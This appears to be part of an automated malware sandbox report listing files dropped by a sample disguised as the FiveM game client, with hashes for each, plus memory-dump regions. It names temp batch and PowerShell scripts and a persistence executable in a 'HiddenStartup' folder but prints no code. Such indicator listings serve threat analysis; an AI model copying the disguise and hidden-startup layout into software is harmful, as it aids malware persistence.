d96ee466b2b7bd7e44a72fac7ddc624b8882252ae9fd1a07c0dad084113a93061551d0bad6b0898a1638d2688ee599dd84b050c14473807986b3e697511a6d66

Download Submit
C:\Users\Admin\AppData\Local\FiveM\FiveM.app\citizen\scripting\v8\natives_universal.d.ts.tmp

Filesize
2.1MB

MD5
c3d94830b2a220533e08ffcc9d44974f

SHA1
388ff56c07acfc78d22608406fdfc9d0467cd228

SHA256
30f48ffe2637e8f4fcebb8dbf30f6207923755336d8f5568ba578300b03a3418

SHA512
62464defcd58e956a7c2a98380a7b9397d19f93f9f3cc61d5fda0cf564becf41f6c5f89eaba9d516840f9f8a043a98e09226ee5193bd1e7ab0e5c3d6bf8ddc12

Download Submit
C:\Users\Admin\AppData\Local\FiveM\FiveM.app\citizen\scripting\v8\natives_universal.js.tmp

Filesize
1.9MB

MD5
681d1b756761d9c7409b072884a8edce

SHA1
08a14e48347f3bef0bd95aa66099b62b67fa07f4

SHA256
51f19f2031f8213ae5a2502b19bb8e60ce42d37da066704c41c1bc9d6f85d387

SHA512
9568f50550b8352cfff31ca36fd585b704145beda629421d337b803d0df35b8658ba2a4b9e3908c66d363a3414d989ec321da6f1e21ff1d48e92cabd393fab63

Download Submit
C:\Users\Admin\AppData\Local\FiveM\FiveM.app\desktop.ini

Filesize
157B

MD5
f9d948aa9426cb1a2a82e651b81a1912

SHA1
2d496caeef3b0bff6b91b99e58736cea51366348

SHA256
b1fe21f251cf7875783ea162ef86c2a5b5022a1c5157bbb7972b6b34e14ec08a

SHA512
a962fae3853f43e4a8e2b33aa5f51a917673d76648845dffcc32037c25cb3f300e4c4fc3ea633bf78b714449dbda84416e41cc16256373c170fb82d8485e3369

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
ce9ce10aa35ba038c09a1360f964df33

SHA1
94e3bf0c26f1366a8835c0c96ac8fc51ab09651d

SHA256
208ad50bf324d4a3c2786c5b52c5c8308f65c9cd3d4a0348dacfc1219225cc9c

SHA512
c79ae0284e4fbaf4616145278b788744e8a38c895792b63b4c4a6fa1aae1b05198e4db62fb47d479fa1a8d1cba3b270dd4e62f20f5a07eb937e845e6e935e18c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
e9a62cdcf4f6981480f78c1a9263ed27

SHA1
2f0a3ad828bd5c3fd6e4672f599e1f9f7e6784fc

SHA256
c5cf22ccd97e8031f7694e649bcf791353db01b599f1fa890efcec6edf92daac

SHA512
15e82cd4f44a21838abdbf7ccbd2afef70ca1a48ea2694c12fc6d2f4960bef53858594f5d4510732b5e03a441fde4eb6e69f776e2e056adc0ac3af6ec51e6127

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
3d8a045152afd1124d77f0ceeab4422a

SHA1
f24fd650ada3835f41d5605646d2defbb5ee7dbb

SHA256
916ccbbb67aac3cf71fb08036b767525fbc5da3611f0df7e58e79038ba2b9819

SHA512
0864d588f20e96796522939ad63bf844abcd57ff639ef4daf9d31cd3bb6a74c34810c44a384db31ce5273602f8fbe29fb67f892fb6f49cbe3030d4fe200745ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\CitizenFX.exe.new

Filesize
5.0MB

MD5
b85b0aa54aec3edcb4ebac2c3a32bc26

SHA1
46b008cce9250dc2f96a1d1cb9b681ac4528866d

SHA256
75d805a8d5ec7281de40c9cbe31445a3ad0f0fe73852c55d06f4dcfefa4a9e4d

SHA512
f14fc451b5e954934521878e31b2231e154eccc380a68d6742531cba1edd5405ca307d29b244d8a703c87115c8393a26620f298dca1571e08e4aa11edf8744d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\FiveM.exe

Filesize
5.0MB

MD5
e8c3fd1b35507fa301fac9367f28757f

SHA1
fd03919c9370248a62c9d540f6cd9fbeccac09f6

SHA256
05a99a0067ddde35a8b6c92721fc8ee058ffe1cee9a9dceb2bafb1a8e2d92368

SHA512
7f4f60aa0978a5f3f49cac744c11b6fe410cf32ec8dcd83fd6ad2120e9830b242b6f6a758c03ca76e8ffa800dbfec1b92f759c176f829f94492ed81e65befcdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1dg41kb.03r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\main.bat

Filesize
556B

MD5
f225cc48602e5003d67679155841c917

SHA1
5f5d572f385155377f39086dcfcbc0a126dcc375

SHA256
73309641458311a723800f190f859e1a7c211b8b5d127ebcb1444f399faa1c34

SHA512
1bcfff70302146428aa0b2677c76f146d0b72404e64db4663ea203fdd68d6acac70fecfa9318cce33b1b9380fea77f18680b1435cf220ceb797b51eaa400787e

Download Submit
C:\Users\Admin\AppData\Local\Temp\script.ps1

Filesize
16KB

MD5
df4610fdd26db657acdffac6211efeab

SHA1
b2bca09e535e6c82a6b733e30f2ef3093ba07bdb

SHA256
da35cad33097983525f475c470f708a14c8fcbffb23600b9f29b0924ea167d77

SHA512
613ab663dd424c0548611dcf195df56d14f12a36046e1d62a014e011b1c55c0c4e7e216763c8c372c26292f1422e4e8660211557b2412ed85bf698b501a74da7

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.bat

Filesize
29KB

MD5
1f191773bfed1d91d8e4d9b7cc6beb1c

SHA1
98937bb72e0cc7e1d44f5fe0d76d62019066bbcf

SHA256
148383cb88c684e98e8c2ce69353fadf3359cf22fd318ef7bba6996c390dd3aa

SHA512
5cd423727fa8cd6d6ecb91a07d1749aa4e55738e0aaaf37a7002a79d8cca1f7efa75f96c8073e24db1a1ab527bbfd73f7fb0cea62cbd1d98ebd53cb6c934d6ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp

Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp43D6.tmp.dat

Filesize
100KB

MD5
fe7f1430f6bbc149ff1e211f28c9674a

SHA1
fb9fbfec9e80acd8088200b402c9d60bd27140b2

SHA256
41b860622a64fc22804e22a9519100d437397b1c1da5255906ee2234cdbe7ce8

SHA512
d52b68ba3df1bb5611b9ab39a03f988089ffb810d08da4abbdf795681ccd2c15c1590c797c623f3a93bc4c92e6181c3982fa464e62d4614d00bb8261f22a12c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp43E9.tmp.dat

Filesize
152KB

MD5
73bd1e15afb04648c24593e8ba13e983

SHA1
4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

SHA256
aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

SHA512
6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBFC6.tmp.bat

Filesize
152B

MD5
d34858d3e2ec14980aba71002dcb3c41

SHA1
9d516f6d70c52a200daa378f41997276ce6d2762

SHA256
0bc562952484bea5ebecdc4bf15e085dfd953438f354d146121eef9326f66a7e

SHA512
e3b0f639babc9f18c9c49917826bbf15415cdc9617f0e0a4a2fb7c8ff8cfa8b6dbe7f258725a87feff121806d8af7733295daeec157e6a5da848ab91c27a6ea4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\HiddenStartup\MyScriptTemp2\System.exe

Filesize
74KB

MD5
927eeed1c14054f2af63f02818ceb9dc

SHA1
10a03cfb805db9db9dfd59de1ff2fa8d6c5c5dc0

SHA256
abf1e58528cc820c477db243981acb6cada3b77f24ae621131722c6f7f6ce921

SHA512
0251c1b20b34ce1bb8be77f907b2ac5f2cff28fbfdd3c7e869a4d2fcc041941e9acf9bbb7ca1304c899ee4bf390d58afe27dddb336dea3c2d36ecbc08be2269a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FiveM.lnk

Filesize
2KB

MD5
ff382d35916bafa7916dbe726fca9918

SHA1
bf6c8a9ad383d2ed25fef94c449e77b5bfe32ad4

SHA256
10acf293fec5bced76dab66226bdcc982212eb880308ca31a333320b11a4f867

SHA512
94d8d1c099d5d3f359cafc5a03d5cd7808ce08e8c0253c58889701752face52b669aeb2fc9324d6773c21ae736c3cfcd789b0103be28201cc5079f7b53fdd554

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
C:\Users\Admin\Videos\Captures\desktop.ini

Filesize
190B

MD5
b0d27eaec71f1cd73b015f5ceeb15f9d

SHA1
62264f8b5c2f5034a1e4143df6e8c787165fbc2f

SHA256
86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

SHA512
7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

Download Submit
memory/1212-1050-0x000000001C270000-0x000000001C27A000-memory.dmp

Filesize
40KB

Download
memory/1212-1168-0x000000001C170000-0x000000001C1EA000-memory.dmp

Filesize
488KB

Download
memory/1212-1009-0x000000001C290000-0x000000001C2AE000-memory.dmp

Filesize
120KB

Download
memory/1212-1008-0x000000001C370000-0x000000001C492000-memory.dmp

Filesize
1.1MB

Download
memory/1212-1007-0x000000001C2F0000-0x000000001C366000-memory.dmp

Filesize
472KB

Download
memory/1212-1210-0x000000001C860000-0x000000001C8E4000-memory.dmp

Filesize
528KB

Download
memory/1212-1049-0x000000001C6C0000-0x000000001C7F4000-memory.dmp

Filesize
1.2MB

Download
memory/1212-1048-0x000000001C590000-0x000000001C5B2000-memory.dmp

Filesize
136KB

Download
memory/1212-1051-0x000000001C2B0000-0x000000001C2C0000-memory.dmp

Filesize
64KB

Download
memory/2156-214-0x0000000007BB0000-0x000000000822A000-memory.dmp

Filesize
6.5MB

Download
memory/2156-187-0x0000000005FB0000-0x0000000006304000-memory.dmp

Filesize
3.3MB

Download
memory/2156-189-0x0000000006900000-0x000000000694C000-memory.dmp

Filesize
304KB

Download
memory/2376-814-0x00000000006A0000-0x00000000006B8000-memory.dmp

Filesize
96KB

Download
memory/3256-279-0x0000000005370000-0x00000000056C4000-memory.dmp

Filesize
3.3MB

Download
memory/4624-86-0x00000000069A0000-0x00000000069BA000-memory.dmp

Filesize
104KB

Download
memory/4624-88-0x0000000007AB0000-0x0000000008054000-memory.dmp

Filesize
5.6MB

Download
memory/4624-17-0x0000000004EF0000-0x0000000004F26000-memory.dmp

Filesize
216KB

Download
memory/4624-18-0x00000000055C0000-0x0000000005BE8000-memory.dmp

Filesize
6.2MB

Download
memory/4624-21-0x0000000005510000-0x0000000005532000-memory.dmp

Filesize
136KB

Download
memory/4624-22-0x0000000005DE0000-0x0000000005E46000-memory.dmp

Filesize
408KB

Download
memory/4624-24-0x0000000005E50000-0x0000000005EB6000-memory.dmp

Filesize
408KB

Download
memory/4624-35-0x0000000005FC0000-0x0000000006314000-memory.dmp

Filesize
3.3MB

Download
memory/4624-51-0x00000000064A0000-0x00000000064BE000-memory.dmp

Filesize
120KB

Download
memory/4624-52-0x00000000064E0000-0x000000000652C000-memory.dmp

Filesize
304KB

Download
memory/4624-85-0x0000000007460000-0x00000000074F6000-memory.dmp

Filesize
600KB

Download
memory/4624-87-0x00000000069F0000-0x0000000006A12000-memory.dmp

Filesize
136KB

Download
memory/5004-408-0x00000000076E0000-0x00000000076EA000-memory.dmp

Filesize
40KB

Download
memory/5004-364-0x0000000007500000-0x0000000007532000-memory.dmp

Filesize
200KB

Download
memory/5004-367-0x0000000070420000-0x000000007046C000-memory.dmp

Filesize
304KB

Download
memory/5004-368-0x00000000705A0000-0x00000000708F4000-memory.dmp

Filesize
3.3MB

Download
memory/5004-380-0x0000000007540000-0x000000000755E000-memory.dmp

Filesize
120KB

Download
memory/5004-389-0x0000000007570000-0x0000000007613000-memory.dmp

Filesize
652KB

Download
memory/5004-489-0x0000000007E70000-0x0000000007E78000-memory.dmp

Filesize
32KB

Download
memory/5004-430-0x0000000007700000-0x0000000007711000-memory.dmp

Filesize
68KB

Download
memory/5004-472-0x0000000007740000-0x000000000774E000-memory.dmp

Filesize
56KB

Download
memory/5004-473-0x0000000007750000-0x0000000007764000-memory.dmp

Filesize
80KB

Download
memory/5004-486-0x0000000007E80000-0x0000000007E9A000-memory.dmp

Filesize
104KB

Download